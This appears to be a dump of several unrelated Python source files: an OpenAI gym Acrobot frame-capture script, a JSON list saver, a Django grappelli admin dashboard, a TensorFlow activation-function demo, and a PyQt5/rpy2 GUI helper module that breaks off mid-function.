import matplotlib.pyplot as plt
import gym
import pyglet
import time
import numpy as np
"""
Ensure you have imagemagick installed with
sudo apt-get install imagemagick
Open file in CLI with:
xgd-open <filelname>
"""
#class RenderActionWrapper(gym.Wrappers):
def save_frames_as_gif(frames, path='./', filename='gym_animation.gif'):
    """Display the captured frames; the animated-gif export is stubbed out.

    frames: list of HxWx3 uint8 arrays captured from the env render loop.
    """
    # Mess with this to change frame size (72 dpi converts pixels -> inches)
    fig = plt.figure(figsize=(frames[0].shape[1] / 72.0, frames[0].shape[0] / 72.0), dpi=72)
    plt.axis('off')
    fig.tight_layout()
    patch = plt.imshow(frames[0])
    plt.show()
    # NOTE(review): gif export disabled -- re-enable once imagemagick is installed.
    #animate = lambda i: patch.set_data(frames[i])
    #gif = animation.FuncAnimation(plt.gcf(), animate, frames = len(frames), interval=50)
    #gif.save(path + filename, writer='imagemagick', fps=20)
# Make gym env
env = gym.make('Acrobot-v1')
# Run the env, capturing one RGB frame (with a pyglet action overlay) per step
observation = env.reset()
frames = []
score_label = pyglet.text.Label('0000', font_size=36,
                                x=20, y=480, anchor_x='left', anchor_y='top',
                                color=(255, 63, 63, 255))
for t in range(10):
    action = env.action_space.sample()
    # Render to frames buffer
    time.sleep(.1)
    env.render(mode="rgb_array")
    score_label.text = "Action: {: d}".format(action - 1)
    score_label.draw()
    env.viewer.window.flip()
    # Bug fix: np.fromstring is deprecated for binary data (and removed in
    # newer NumPy); np.frombuffer reads the raw pixel buffer without copying.
    arr = np.frombuffer(pyglet.image.get_buffer_manager().get_color_buffer().get_image_data().get_data(), dtype=np.uint8)
    # flip vertically (GL origin is bottom-left) and drop the alpha channel
    arr = arr.reshape(env.viewer.height, env.viewer.width, 4)[::-1, :, 0:3]
    print(arr.shape)
    frames.append(arr)
    _, _, done, _ = env.step(action)
    if done:
        break
env.close()
# drop the first frame (captured before the overlay settles)
save_frames_as_gif(frames[1:])
|
983,715 | 98814b16cb6911baf1f5b2cae5f2742149e51bf7 | #!/usr/bin/python3
"""Module for task 7 - Load, add, save"""
from sys import argv
import os
import json
save_to_json_file = __import__('5-save_to_json_file').save_to_json_file
load_from_json_file = __import__('6-load_from_json_file').load_from_json_file
# Load the previously saved list (if any), append the CLI arguments, save back.
if os.path.isfile("add_item.json"):
    my_list = load_from_json_file("add_item.json")
else:
    my_list = []
my_list.extend(argv[1:])
save_to_json_file(my_list, "add_item.json")
|
983,716 | 824a406c62ac250cbdfc7dbef3d35cf6c3c76340 | # -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from common.models import SiteTemplate
from grappelli.dashboard import modules, Dashboard
from grappelli.dashboard.utils import get_admin_site_name
class CustomIndexDashboard(Dashboard):
    """
    Custom index dashboard for www.
    """
    template = 'frontend/admin_dashboard.html'

    def init_with_context(self, context):
        """Assemble the dashboard: role-grouped model lists in column 1,
        link lists and recent actions in column 2."""
        # NOTE(review): site_name is assigned but never used -- confirm before removing.
        site_name = get_admin_site_name(context)
        # Operator section: order handling
        self.children.append(modules.ModelList(
            title=u'Оператору',
            column=1,
            models=(
                'frontend.models.ShopOrder',
                'frontend.models.FastOrder'
            )
        ))
        # Content-manager section: catalogue and site content
        self.children.append(modules.ModelList(
            title=u'Контент-менеджеру',
            column=1,
            models=(
                'frontend.models.News',
                'frontend.models.SimplePage',
                'frontend.models.Product',
                'frontend.models.ProductVariant',
                'frontend.models.Slider',
                'frontend.models.Category',
            )
        ))
        # Administrator section: shop configuration
        self.children.append(modules.ModelList(
            title=u'Администратору',
            column=1,
            models=(
                'frontend.models.City',
                'frontend.models.Discount',
                'frontend.models.DeliveryType',
                'frontend.models.DeliveryTime',
                'frontend.models.PaymentType',
                'frontend.models.OrderStatus',
                'frontend.models.Settings',
                'frontend.models.LinkedSite',
                # 'django.contrib.auth.models.User',
                # 'frontend.models.UserProfile'
            )
        ))
        # Developer section: templates, site settings, django internals
        self.children.append(modules.ModelList(
            title=u'Программисту',
            column=1,
            models=(
                # 'frontend.models.MailTemplate',
                # 'vest.common.models.*',
                'common.models.SiteTemplate',
                'common.models.SiteSettings',
                'django.contrib.*'
            )
        ))
        # Maintenance actions are restricted to superusers
        if context['request'].user.is_superuser:
            self.children.append(modules.LinkList(
                u'Спец. функции',
                column=2,
                children=[
                    {
                        'title': u'Сформировать Yml',
                        'url': reverse('frontend:view_yml_gen'),
                        'external': False
                    },
                    {
                        'title': u'Сформировать Sitemap',
                        'url': reverse('frontend:view_sitemap_gen'),
                        'external': False
                    },
                    {
                        'title': u'Перенести шаблоны в базу',
                        'url': reverse('frontend:view_template_to_db'),
                        'external': False
                    },
                    {
                        'title': u'Запустить анти-конкурента',
                        'url': reverse('frontend:view_price_set'),
                        'external': False
                    },
                ]
            ))
        # Static links to screencast tutorials served from /media/video/
        self.children.append(modules.LinkList(
            u'Инструкции',
            column=2,
            children=[
                {
                    'title': u'Работа с шаблонами',
                    'url': '/media/video/template.swf',
                    'external': False,
                },
                {
                    'title': u'Работа с простыми страницами',
                    'url': r'/media/video/simple_page.swf',
                    'external': False
                },
                {
                    'title': u'Добавление текста в шаблон',
                    'url': r'/media/video/add_text.swf',
                    'external': False
                },
                {
                    'title': u'Привязка нескольких страниц к одному url',
                    'url': r'/media/video/multiple_page.swf',
                    'external': False
                }
            ]
        ))
        # append a recent actions module
        self.children.append(modules.RecentActions(
            _('Recent Actions'),
            limit=5,
            collapsible=False,
            column=2,
        ))
        # # append a group for "Administration" & "Applications"
        # self.children.append(modules.Group(
        #     _('Group: Administration & Applications'),
        #     column=1,
        #     collapsible=True,
        #     children = [
        #         modules.AppList(
        #             _('Administration'),
        #             column=1,
        #             collapsible=False,
        #             models=('django.contrib.*',),
        #         ),
        #         modules.AppList(
        #             _('Applications'),
        #             column=1,
        #             css_classes=('collapse closed',),
        #             exclude=('django.contrib.*',),
        #         )
        #     ]
        # ))
        #
        # # append an app list module for "Applications"
        # self.children.append(modules.AppList(
        #     _('AppList: Applications'),
        #     collapsible=True,
        #     column=1,
        #     css_classes=('collapse closed',),
        #     exclude=('django.contrib.*',),
        # ))
        #
        # # append an app list module for "Administration"
        # self.children.append(modules.ModelList(
        #     _('ModelList: Administration'),
        #     column=1,
        #     collapsible=False,
        #     models=('django.contrib.*',),
        # ))
        # append a recent actions module
|
983,717 | a529cc70c5d43d3248c9f0a0dd1387e13545002b | import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
def plot_act(i=1.0, actfunc=lambda x: x):
    """Surface-plot actfunc(w*i + b) over a grid of weights and biases.

    NOTE(review): relies on the module-level TF1 `sess`; evaluates one scalar
    tensor per grid point, so it is slow but simple.
    """
    ws = np.arange(-0.5, 0.5, 0.05)
    bs = np.arange(-0.5, 0.5, 0.05)
    X, Y = np.meshgrid(ws, bs)
    # evaluate the activation at every (w, b) pair of the flattened grid
    os = np.array([actfunc(tf.constant(w*i + b)).eval(session=sess) \
                   for w,b in zip(np.ravel(X), np.ravel(Y))])
    Z = os.reshape(X.shape)
    fig = plt.figure()
    ax = fig.add_subplot(111, projection='3d')
    ax.plot_surface(X, Y, Z, rstride=1, cstride=1)
# start a TF1 session (required for the .eval() calls below)
sess = tf.Session();
# create a simple input of 3 real values (shape [1, 3] row vector)
i = tf.constant([1.0, 2.0, 3.0], shape=[1, 3])
# create a matrix of weights (randomly initialised each run)
w = tf.random_normal(shape=[3, 3])
# create a vector of biases
b = tf.random_normal(shape=[1, 3])
# dummy (identity) activation function
def func(x): return x
# tf.matmul will multiply the input(i) tensor and the weight(w) tensor then sum the result with the bias(b) tensor.
act = func(tf.matmul(i, w) + b)
# evaluate the tensor to a numpy array
act.eval(session=sess)
# identity (linear) activation — NOTE(review): the original comment said "step function"
plot_act(1.0, func)
# sigmoid function
plot_act(1, tf.sigmoid)
# using sigmoid in nn layer
act = tf.sigmoid(tf.matmul(i, w) + b)
act.eval(session=sess)
# tanh
plot_act(1, tf.tanh)
# using tanh in nn layer
act = tf.tanh(tf.matmul(i, w) + b)
act.eval(session=sess)
# relu
plot_act(1, tf.nn.relu)
# using relu in nn layer
act = tf.nn.relu(tf.matmul(i, w) + b)
act.eval(session=sess) |
983,718 | bed66adbbd4d1fdd403960c80ee77ee7aca51b6e | # module import
import os
import re
import sys
import copy
import functools
import math as m
import numpy as np
import pandas as pd
import pickle as p
import seaborn as sns
from numpy import ndarray
from skimage import measure
from numpy.matlib import repmat
import matplotlib.pyplot as plt
from fuzzywuzzy import fuzz, process
# matplotlib module import
from matplotlib.patches import Polygon
from matplotlib.text import Annotation
# pyqt5 module import
from PyQt5.QtGui import QFont, QFontMetrics, QColor
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import (QGroupBox, QPushButton, QListWidget, QComboBox, QMenuBar, QProgressBar, QHeaderView,
QMenu, QAction, QLabel, QWidget, QLineEdit, QCheckBox, QMessageBox, QTableWidget,
QTabWidget, QTableWidgetItem, QHBoxLayout)
#
from scipy.optimize import curve_fit
from matplotlib.colors import to_rgba_array
import rpy2.robjects as ro
import rpy2.robjects.numpy2ri
from rpy2.robjects import FloatVector, BoolVector, StrVector, IntVector
from rpy2.robjects.packages import importr
from rpy2.robjects.functions import SignatureTranslatedFunction
rpy2.robjects.numpy2ri.activate()
# r-library import
r_stats = importr("stats")
r_pROC = importr("pROC")
#
_roc = r_pROC.roc
_ci_auc = SignatureTranslatedFunction(r_pROC.ci_auc,
init_prm_translate = {'boot_n': 'boot.n', 'conf_level': 'conf.level'})
_roc_test = SignatureTranslatedFunction(r_pROC.roc_test,
init_prm_translate = {'boot_n': 'boot.n'})
# lambda function declarations
# linear fits (through the origin, and with a constant offset)
lin_func = lambda x, a: a * x
lin_func_const = lambda x, a, b: a * x + b
# per-cell spike counts from a list of spike-time arrays
spike_count_fcn = lambda t_sp: np.array([len(x) for x in t_sp])
# elementwise selection between two arrays based on a boolean mask
swap_array = lambda x1, x2, is_swap: np.array([x if is_sw else y for x, y, is_sw in zip(x1, x2, is_swap)])
# combine_spike_freq = lambda sp_freq, i_dim: flat_list([list(sp_freq[i_filt][:, i_dim]) for i_filt in range(len(sp_freq))])
# occurrence counts of the values 0..n-1 within x
calc_rel_count = lambda x, n: np.array([sum(x == i) for i in range(n)])
# converts a 0-255 rgb triple into a matplotlib rgba array
convert_rgb_col = lambda col: to_rgba_array(np.array(col) / 255, 1)
# significance marker ('*' when below the p-value threshold)
sig_str_fcn = lambda x, p_value: '*' if x < p_value else ''
# unique values of a field over a list of waveform-parameter tables
# (uses flat_list, defined further down — resolved at call time)
get_field = lambda wfm_para, f_key: np.unique(flat_list([list(x[f_key]) for x in wfm_para]))
# vectorisation function declarations
# spike frequency = spike count / phase duration (0 for missing entries)
sp_freq = lambda x, t_phase: len(x) / t_phase if x is not None else 0
sp_freq_fcn = np.vectorize(sp_freq)
# unicode characters
_bullet_point = '\u2022'
_mu = '\u03bc'
_delta = '\u0394'
_plusminus = '\u00b1'
# other initialisations
t_wid_f = 0.99
n_plot_max = 25
dcopy = copy.deepcopy
is_linux = sys.platform == 'linux'
default_dir_file = os.path.join(os.getcwd(), 'default_dir.p')
# base plot colours (0-255 rgb lists / tuples); custom_col extends the
# matplotlib 'CN' cycle used by get_plot_col for indices >= 10
_red, _black, _green = [140, 0, 0], [0, 0, 0], [47, 150, 0]
_blue, _gray, _light_gray, _orange = [0, 30, 150], [90, 90, 50], [200, 200, 200], [255, 110, 0]
_bright_red, _bright_cyan, _bright_purple = (249, 2, 2), (2, 241, 249), (245, 2, 249)
_bright_yellow = (249, 221, 2)
custom_col = [_bright_yellow, _bright_red, _bright_cyan, _bright_purple, _red,
              _black, _green, _blue, _gray, _light_gray, _orange]
def flat_list(l):
    '''
    Flattens a one-level nested list into a single flat list.

    :param l: list whose elements may themselves be lists/arrays
    :return: flattened list (the input unchanged when it is not nested)
    '''
    # an empty input has nothing to flatten
    if len(l) == 0:
        return []
    # only flatten when the first element is itself a sequence
    if isinstance(l[0], (list, ndarray)):
        return [v for sub in l for v in sub]
    return l
def set_pvalue_string(p_value, p_lim=0.05):
    '''
    Formats a p-value string, appending '*' when significant.

    :param p_value: p-value being formatted
    :param p_lim: significance threshold for the '*' marker
    :return: formatted p-value string
    '''
    # extremely small values are clamped to 1e-20 (always significant)
    if p_value < 1e-20:
        return '{:5.3e}*'.format(1e-20)
    # small values use scientific notation, the rest fixed-point
    fmt = '{:5.3e}{}' if p_value < 1e-2 else '{:5.3f}{}'
    return fmt.format(p_value, sig_str_fcn(p_value, p_lim))
def calc_rel_prop(x, n, N=None, return_counts=False, ind=None):
    '''
    Calculates relative proportions (or raw counts) of index values in x.

    :param x: array of index values
    :param n: number of index values (used when ind is None)
    :param N: optional normalisation count (len(x) is used when None)
    :param return_counts: True to return raw counts instead of percentages
    :param ind: optional explicit index values to count
    :return: array of counts/percentages (scalar 0 when N == 0)
    '''
    # defaults to counting the values 0..n-1
    if ind is None:
        ind = np.arange(n)
    # tally the occurrences of each index value
    n_count = np.array([sum(x == i) for i in ind])
    if return_counts:
        return n_count
    if N is None:
        # percentage relative to the total sample size
        return 100 * n_count / len(x)
    # percentage relative to an explicit total (guarding N == 0)
    return 0 if (N == 0) else 100 * n_count / N
class CheckableComboBox(QComboBox):
    # A combobox whose dropdown entries carry checkboxes. Supports an optional
    # non-selectable header line (first_line) and an optional "all" entry at
    # index 1 that enables/disables the remaining entries (has_all).
    def __init__(self, parent=None, has_all=False, first_line=None):
        '''
        :param parent: parent widget
        :param has_all: True if item 1 acts as an enable/disable "all" toggle
        :param first_line: optional non-checkable header text at index 0
        '''
        super(CheckableComboBox, self).__init__(parent)
        # toggling happens on the press event of the dropdown view
        self.view().pressed.connect(self.handleItemPressed)
        self.n_item = 0
        self.has_all = has_all
        self.first_line = first_line
    def addItem(self, item, can_check):
        '''
        Appends an entry to the combobox.

        :param item: entry text
        :param can_check: True for a checkable entry, False for a disabled
                          (header-style) entry
        :return:
        '''
        super(CheckableComboBox, self).addItem(item)
        # retrieves the model item that was just appended
        item = self.model().item(self.count()-1,0)
        self.n_item += 1
        if can_check:
            # item.setFlags(Qt.ItemIsUserCheckable | Qt.ItemIsEnabled)
            item.setFlags(Qt.ItemIsEnabled)
            item.setCheckState(Qt.Unchecked)
        else:
            # non-checkable entries are fully disabled
            item.setFlags(Qt.NoItemFlags)
    # def itemChecked(self, index):
    #     item = self.model().item(index, 0)
    #     return item.checkState() == Qt.Checked
    def getSelectedItems(self):
        '''
        Returns the text of all currently checked entries.

        :return: list of checked entry strings
        '''
        # initialisations
        txt_sel = []
        # retrieves the checkbox text for selected items
        for i in range(self.count()):
            item = self.model().item(i)
            if item.checkState() == Qt.Checked:
                txt_sel.append(item.text())
        # returns the selected text
        return txt_sel
    def setState(self, index, state):
        '''
        Explicitly sets the check state of one entry.

        :param index: entry index (index 0 is ignored when a header exists)
        :param state: True to check, False to uncheck
        :return:
        '''
        # the header line (index 0) is never checkable
        if (index == 0) and (self.first_line is not None):
            return
        item = self.model().item(index)
        item.setCheckState(Qt.Checked if state else Qt.Unchecked)
    def handleItemPressed(self, index, is_checked=None):
        '''
        Toggles an entry's check state on press; with has_all, item 1 also
        enables (when being checked off) or clears+disables the other items.

        :param index: pressed entry (int index or QModelIndex)
        :param is_checked: optional explicit current state override
        :return:
        '''
        # the header line (index 0) is never toggled
        if (index == 0) and (self.first_line is not None):
            return
        # resolves the model item from either an int or a QModelIndex
        if isinstance(index, int):
            item, i_sel = self.model().item(index), index
        else:
            item = self.model().itemFromIndex(index)
            i_sel = item.row()
        # toggles the entry's check state
        if is_checked is None:
            is_checked = (item.checkState() == Qt.Checked)
        item.setCheckState(Qt.Unchecked if is_checked else Qt.Checked)
        # the "all" entry (index 1) gates the availability of the rest
        if (i_sel == 1) and self.has_all:
            for i_item in range(2, self.n_item):
                item_new = self.model().item(i_item)
                if is_checked:
                    item_new.setFlags(Qt.ItemIsEnabled)
                else:
                    item_new.setCheckState(Qt.Unchecked)
                    item_new.setFlags(Qt.NoItemFlags)
#########################################
#### OBJECT PROPERTY FUNCTIONS ####
#########################################
def create_font_obj(size=8, is_bold=False, font_weight=QFont.Normal):
    '''
    Creates a QFont with the given point size, bold flag and weight.

    :param size: font point size
    :param is_bold: True for a bold font
    :param font_weight: QFont weight value
    :return: the configured font object
    '''
    # builds and configures the font in one pass
    h_font = QFont()
    h_font.setPointSize(size)
    h_font.setBold(is_bold)
    h_font.setWeight(font_weight)
    return h_font
def update_obj_font(h_obj, pointSize=8, weight=QFont.Normal):
    '''
    Resets a widget's font size/weight while keeping its current family.

    :param h_obj: widget whose font is updated
    :param pointSize: new font point size
    :param weight: new font weight
    :return:
    '''
    # rebuilds the font from the widget's existing family
    family = h_obj.font().family()
    h_obj.setFont(QFont(family, pointSize=pointSize, weight=weight))
def set_obj_fixed_size(h_obj, width=None, height=None, fix_size=True):
    '''
    Resizes a widget, optionally locking its size.

    :param h_obj: widget being resized
    :param width: new width (size-hint width when None)
    :param height: new height (size-hint height when None)
    :param fix_size: True to fix the size, False for a plain resize
    '''
    # missing dimensions fall back on the widget's size hint
    hint = h_obj.sizeHint()
    w_new = hint.width() if width is None else width
    h_new = hint.height() if height is None else height
    # applies either a fixed size or a simple resize
    if fix_size:
        h_obj.setFixedSize(w_new, h_new)
    else:
        h_obj.resize(w_new, h_new)
def set_text_colour(text, col='black'):
    '''
    Wraps text in an html span that renders it in the given colour.

    :param text: text being coloured
    :param col: colour name/spec for the span style
    :return: html snippet string
    '''
    return f'<span style="color:{col}">{text}</span>'
#####################################################
#### PYQT5 OBJECT INITIALISATION FUNCTIONS ####
#####################################################
def create_groupbox(parent, dim, font, title, name=None):
    '''
    Creates a QGroupBox with the given geometry, font and title.

    :param parent: parent widget
    :param dim: groupbox geometry
    :param font: font object (a default font is created when None)
    :param title: groupbox title text
    :param name: optional object name
    :return: the groupbox object
    '''
    # creates the groupbox, falling back on a default font
    h_grp = QGroupBox(parent)
    h_grp.setGeometry(dim)
    h_grp.setFont(font if font is not None else create_font_obj())
    h_grp.setTitle(title)
    # applies the optional object name
    if name is not None:
        h_grp.setObjectName(name)
    return h_grp
def create_label(parent, font, text, dim=None, name=None, align='left'):
    '''
    Creates a QLabel with the given text and alignment.

    :param parent: parent widget
    :param font: font object for the label
    :param text: label text
    :param dim: optional geometry
    :param name: optional object name
    :param align: horizontal alignment ('centre', 'left', anything else = right)
    :return: the label object
    '''
    # creates the label and sets its core properties
    h_lbl = QLabel(parent)
    h_lbl.setFont(font)
    h_lbl.setText(text)
    # applies the optional geometry/object name
    if dim is not None:
        h_lbl.setGeometry(dim)
    if name is not None:
        h_lbl.setObjectName(name)
    # maps the alignment string onto the matching Qt flag
    align_map = {'centre': Qt.AlignCenter, 'left': Qt.AlignLeft}
    h_lbl.setAlignment(align_map.get(align, Qt.AlignRight))
    return h_lbl
def create_edit(parent, font, text, dim=None, name=None, cb_fcn=None, align='centre'):
    '''
    Creates a QLineEdit editbox.

    :param parent: parent widget
    :param font: font object (a default font is created when None)
    :param text: initial editbox text
    :param dim: optional geometry
    :param name: optional object name
    :param cb_fcn: optional editing-finished callback
    :param align: horizontal alignment ('centre', 'left', anything else = right)
    :return: the editbox object
    '''
    # creates the editbox, falling back on a default font
    h_edit = QLineEdit(parent)
    h_edit.setFont(font if font is not None else create_font_obj())
    h_edit.setText(text)
    # applies the optional object name/geometry
    if name is not None:
        h_edit.setObjectName(name)
    if dim is not None:
        h_edit.setGeometry(dim)
    # maps the alignment string onto the matching Qt flag
    align_map = {'centre': Qt.AlignCenter, 'left': Qt.AlignLeft}
    h_edit.setAlignment(align_map.get(align, Qt.AlignRight))
    # connects the editing-finished callback (if given)
    if cb_fcn is not None:
        h_edit.editingFinished.connect(cb_fcn)
    return h_edit
def create_button(parent, dim, font, text, name=None, icon=None, tooltip=None, cb_fcn=None):
    '''
    Creates a QPushButton.

    :param parent: parent widget
    :param dim: optional geometry
    :param font: font object (a default font is created when None)
    :param text: button text
    :param name: optional object name
    :param icon: optional button icon
    :param tooltip: optional tooltip string
    :param cb_fcn: optional clicked callback
    :return: the button object
    '''
    # creates the button, falling back on a default font
    h_but = QPushButton(parent)
    h_but.setFont(font if font is not None else create_font_obj())
    h_but.setText(text)
    # applies the optional properties
    if dim is not None:
        h_but.setGeometry(dim)
    if name is not None:
        h_but.setObjectName(name)
    if icon is not None:
        h_but.setIcon(icon)
    if tooltip is not None:
        h_but.setToolTip(tooltip)
    # connects the clicked callback (if given)
    if cb_fcn is not None:
        h_but.clicked.connect(cb_fcn)
    return h_but
def create_checkbox(parent, font, text, dim=None, name=None, state=False, cb_fcn=None):
    '''
    Creates a QCheckBox.

    :param parent: parent widget
    :param font: font object (a default font is created when None)
    :param text: checkbox text
    :param dim: optional geometry
    :param name: optional object name
    :param state: initial checked state
    :param cb_fcn: optional state-changed callback
    :return: the checkbox object
    '''
    # creates the checkbox, falling back on a default font
    h_cbox = QCheckBox(parent)
    h_cbox.setText(text)
    h_cbox.setFont(font if font is not None else create_font_obj())
    h_cbox.setChecked(state)
    # applies the optional geometry/object name
    if dim is not None:
        h_cbox.setGeometry(dim)
    if name is not None:
        h_cbox.setObjectName(name)
    # connects the state-changed callback (if given)
    if cb_fcn is not None:
        h_cbox.stateChanged.connect(cb_fcn)
    return h_cbox
def create_listbox(parent, dim, font, text, name=None, cb_fcn=None):
    '''
    Creates a QListWidget, optionally pre-filled with entries.

    :param parent: parent widget
    :param dim: optional geometry
    :param font: font object (a default font is created when None)
    :param text: optional list of entry strings
    :param name: optional object name
    :param cb_fcn: optional selection-changed callback
    :return: the listbox object
    '''
    # creates the listbox, falling back on a default font
    h_lbox = QListWidget(parent)
    h_lbox.setFont(font if font is not None else create_font_obj())
    # applies the optional geometry/object name
    if dim is not None:
        h_lbox.setGeometry(dim)
    if name is not None:
        h_lbox.setObjectName(name)
    # connects the selection-changed callback (if given)
    if cb_fcn is not None:
        h_lbox.itemSelectionChanged.connect(cb_fcn)
    # fills the listbox entries (if given)
    if text is not None:
        for entry in text:
            h_lbox.addItem(entry)
    return h_lbox
def create_progressbar(parent, dim, font, text=None, init_val=0, name=None, max_val=100.0):
    '''
    Creates a QProgressBar.

    :param parent: parent widget
    :param dim: progressbar geometry
    :param font: font object (a default font is created when None)
    :param text: progressbar text (the text is hidden when None)
    :param init_val: initial progressbar value
    :param name: optional object name
    :param max_val: maximum progressbar value
    :return: the progressbar object
    '''
    # creates a default font object (if not provided)
    if font is None:
        font = create_font_obj()
    # creates the progressbar object
    h_pbar = QProgressBar(parent)
    # sets the progressbar properties. the maximum is applied before the value
    # (so init_val is not clamped against the previous maximum) and is coerced
    # to int, as QProgressBar.setMaximum() rejects floats (the default max_val
    # is the float 100.0)
    h_pbar.setGeometry(dim)
    h_pbar.setFont(font)
    h_pbar.setMaximum(int(max_val))
    h_pbar.setValue(int(init_val))
    # sets the object name (if provided)
    if name is not None:
        h_pbar.setObjectName(name)
    # hides the text if not provided
    if text is None:
        h_pbar.setTextVisible(False)
    # returns the progressbar object
    return h_pbar
def create_combobox(parent, font, text, dim=None, name=None, cb_fcn=None):
    '''
    Creates a QComboBox, optionally pre-filled with options.

    :param parent: parent widget
    :param font: font object (a default font is created when None)
    :param text: optional list of option strings
    :param dim: optional geometry
    :param name: optional object name
    :param cb_fcn: optional index-changed callback
    :return: the combobox object
    '''
    # creates the combobox, falling back on a default font
    h_combo = QComboBox(parent)
    h_combo.setFont(font if font is not None else create_font_obj())
    # applies the optional geometry/object name
    if dim is not None:
        h_combo.setGeometry(dim)
    if name is not None:
        h_combo.setObjectName(name)
    # fills the combobox options (if given)
    if text is not None:
        for opt in text:
            h_combo.addItem(opt)
    # connects the index-changed callback (if given)
    if cb_fcn is not None:
        h_combo.currentIndexChanged.connect(cb_fcn)
    return h_combo
def create_checkcombo(parent, font, text, dim=None, name=None, cb_fcn=None,
                      first_line='--- Select From Options List Below ---', has_all=False):
    '''
    Creates a CheckableComboBox (combobox with checkable entries).

    :param parent: parent widget
    :param font: font object (a default font is created when None)
    :param text: optional list of option strings
    :param dim: optional geometry
    :param name: optional object name
    :param cb_fcn: optional view-pressed callback
    :param first_line: non-checkable header line text (None for no header)
    :param has_all: True if item 1 acts as an enable/disable "all" toggle
    :return: the checkable combobox object
    '''
    # creates the checkable combobox, falling back on a default font
    h_ccombo = CheckableComboBox(parent, has_all, first_line)
    h_ccombo.setFont(font if font is not None else create_font_obj())
    # applies the optional geometry/object name
    if dim is not None:
        h_ccombo.setGeometry(dim)
    if name is not None:
        h_ccombo.setObjectName(name)
    # fills the options, prepending the non-checkable header line (if any)
    if text is not None:
        opts = text if first_line is None else [first_line] + text
        for i_opt, opt in enumerate(opts):
            h_ccombo.addItem(opt, i_opt > 0)
    # connects the view-pressed callback (if given)
    if cb_fcn is not None:
        h_ccombo.view().pressed.connect(cb_fcn)
    return h_ccombo
def create_table(parent, font, data=None, col_hdr=None, row_hdr=None, n_row=None, dim=None, name=None,
                 cb_fcn=None, combo_fcn=None, max_disprows=3, check_col=None, check_fcn=None, exc_rows=None):
    '''
    Creates a QTableWidget, optionally filled with data, with selected columns
    rendered as centred checkbox widgets and selected rows greyed out/disabled.

    :param parent: parent widget
    :param font: font object (a default font is created when None)
    :param data: optional 2D array of cell values (bools for checkbox columns)
    :param col_hdr: column header labels (required - also sets column count)
    :param row_hdr: optional row header labels
    :param n_row: row count (max_disprows is used when None)
    :param dim: optional geometry
    :param name: optional object name
    :param cb_fcn: optional cell-changed callback
    :param combo_fcn: unused here - kept for signature parity with the other
                      table factory (see create_tablecombo)
    :param max_disprows: maximum rows shown before the table scrolls
    :param check_col: optional list of column indices rendered as checkboxes
    :param check_fcn: optional checkbox state-changed callback, called with
                      (row, col, state) via functools.partial
    :param exc_rows: optional list of excluded row indices (greyed, disabled)
    :return: the table object
    '''
    # row/column counts (the column count comes from the header labels)
    n_col = len(col_hdr)
    if n_row is None:
        n_row = max_disprows
    # creates a default font object (if not provided)
    if font is None:
        font = create_font_obj()
    # creates the table object
    h_table = QTableWidget(parent)
    # sets the object properties
    h_table.setRowCount(n_row)
    h_table.setColumnCount(n_col)
    h_table.setFont(font)
    if col_hdr is not None:
        h_table.setHorizontalHeaderLabels(col_hdr)
    if row_hdr is not None:
        h_table.setVerticalHeaderLabels(row_hdr)
    # sets the object dimensions (if provided)
    if dim is not None:
        h_table.setGeometry(dim)
    # sets the object name (if provided)
    if name is not None:
        h_table.setObjectName(name)
    # sets the callback function (if provided)
    if cb_fcn is not None:
        h_table.cellChanged.connect(cb_fcn)
    # caps the table height so at most max_disprows rows are visible
    h_table.setMaximumHeight(20 + min(max_disprows, n_row) * 22)
    h_table.resizeRowsToContents()
    # stretches every column equally across the table width
    h_hdr = h_table.horizontalHeader()
    for i_col in range(len(col_hdr)):
        h_hdr.setSectionResizeMode(i_col, QHeaderView.Stretch)
    # fills in the table cells (if data was provided)
    if data is not None:
        for i_row in range(n_row):
            for i_col in range(n_col):
                if check_col is not None:
                    if i_col in check_col:
                        # creates the checkbox widget
                        h_chk = QCheckBox()
                        h_chk.setCheckState(Qt.Checked if data[i_row, i_col] else Qt.Unchecked)
                        if check_fcn is not None:
                            # binds the (row, col) position into the callback
                            check_fcn_full = functools.partial(check_fcn, i_row, i_col)
                            h_chk.stateChanged.connect(check_fcn_full)
                        # wraps the checkbox in a centred layout widget
                        h_cell = QWidget()
                        h_layout = QHBoxLayout(h_cell)
                        h_layout.addWidget(h_chk)
                        h_layout.setAlignment(Qt.AlignCenter)
                        h_layout.setContentsMargins(0, 0, 0, 0)
                        h_cell.setLayout(h_layout)
                        # excluded rows get a grey backing item and a
                        # disabled checkbox widget
                        if exc_rows is not None:
                            if i_row in exc_rows:
                                item = QTableWidgetItem('')
                                item.setBackground(QColor(200, 200, 200))
                                h_table.setItem(i_row, i_col, item)
                                h_cell.setEnabled(False)
                        # continues to the next column
                        h_table.setCellWidget(i_row, i_col, h_cell)
                        continue
                # plain (non-checkbox) cell item
                item = QTableWidgetItem(data[i_row, i_col])
                # resets the background colour (if the row is excluded)
                if exc_rows is not None:
                    if i_row in exc_rows:
                        item.setBackground(QColor(200, 200, 200))
                # adds the item to the table
                item.setTextAlignment(Qt.AlignHCenter)
                h_table.setItem(i_row, i_col, item)
    # # if the column is checkable, then modify the cell item properties
    # if check_col is not None:
    #     if i_col in check_col:
    #         item.setFlags(Qt.ItemIsUserCheckable | Qt.ItemIsEnabled)
    #         item.setCheckState(Qt.Checked if data[i_row, i_col] else Qt.Unchecked)
    # returns the table object
    return h_table
def create_tablecombo(parent, font, combo_opt, col_hdr=None, row_hdr=None, n_row=None,
                      dim=None, name=None, cb_fcn=None, combo_fcn=None):
    '''
    Creates a QTableWidget whose selected columns hold combobox cell widgets.

    :param parent: parent widget
    :param font: font object (a default font is created when None)
    :param combo_opt: dict mapping column index -> list of combobox options
    :param col_hdr: column header labels (required - sets column count)
    :param row_hdr: optional row header labels
    :param n_row: row count (3 when None)
    :param dim: optional geometry
    :param name: optional object name
    :param cb_fcn: optional cell-changed callback
    :param combo_fcn: optional (fcn, arg) pair; the combobox callback is
                      fcn(arg, table, row, col) bound via functools.partial
    :return: the table object
    '''
    # default row count
    if n_row is None:
        n_row = 3
    # creates a default font object (if not provided)
    if font is None:
        font = create_font_obj()
    # creates the table object
    h_table = QTableWidget(parent)
    # sets the object properties
    h_table.setRowCount(n_row)
    h_table.setColumnCount(len(col_hdr))
    h_table.setFont(font)
    # creates a combobox cell widget for every row of each combo column
    for opt_col in combo_opt:
        for i_row in range(n_row):
            # sets the combobox callback function (if provided)
            if combo_fcn is None:
                cb_fcn_combo = None
            else:
                # binds the table/position into the combobox callback
